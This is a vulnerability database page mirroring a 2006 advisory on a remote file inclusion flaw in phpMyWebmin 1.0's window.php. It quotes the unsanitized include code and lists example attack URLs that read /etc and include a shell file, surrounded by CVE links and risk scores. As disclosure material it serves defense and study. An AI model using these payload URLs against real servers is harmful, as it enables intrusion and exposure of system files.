Lucene search
+L

phpMyWebmin 1.0 - 'window.php' Remote File Inclusion

🗓️ 28 Sep 2006 00:00:00Reported by Kernel-32Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

PHPMyWebmin 1.0 - 'window.php' Remote File Inclusion. Risk: High. Vulnerable to remote file includes

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-5124
2 Oct 200620:00
cve
cve
CVE
CVE-2006-5125
2 Oct 200620:00
cve
cvelist
Cvelist
CVE-2006-5124
2 Oct 200620:00
cvelist
cvelist
Cvelist
CVE-2006-5125
2 Oct 200620:00
cvelist
exploitdb
Exploit DB
phpMyWebmin 1.0 - 'target' Remote File Inclusion
30 Sep 200600:00
exploitdb
nvd
NVD
CVE-2006-5124
3 Oct 200604:03
nvd
nvd
NVD
CVE-2006-5125
3 Oct 200604:03
nvd
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: [email protected]
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerable File:window.php
$ordner = opendir("$target");
?>

and

include("$target/preferences.php");

if($action != "")
{
include("$action.php");
?>

Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php

# milw0rm.com [2006-09-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03647
39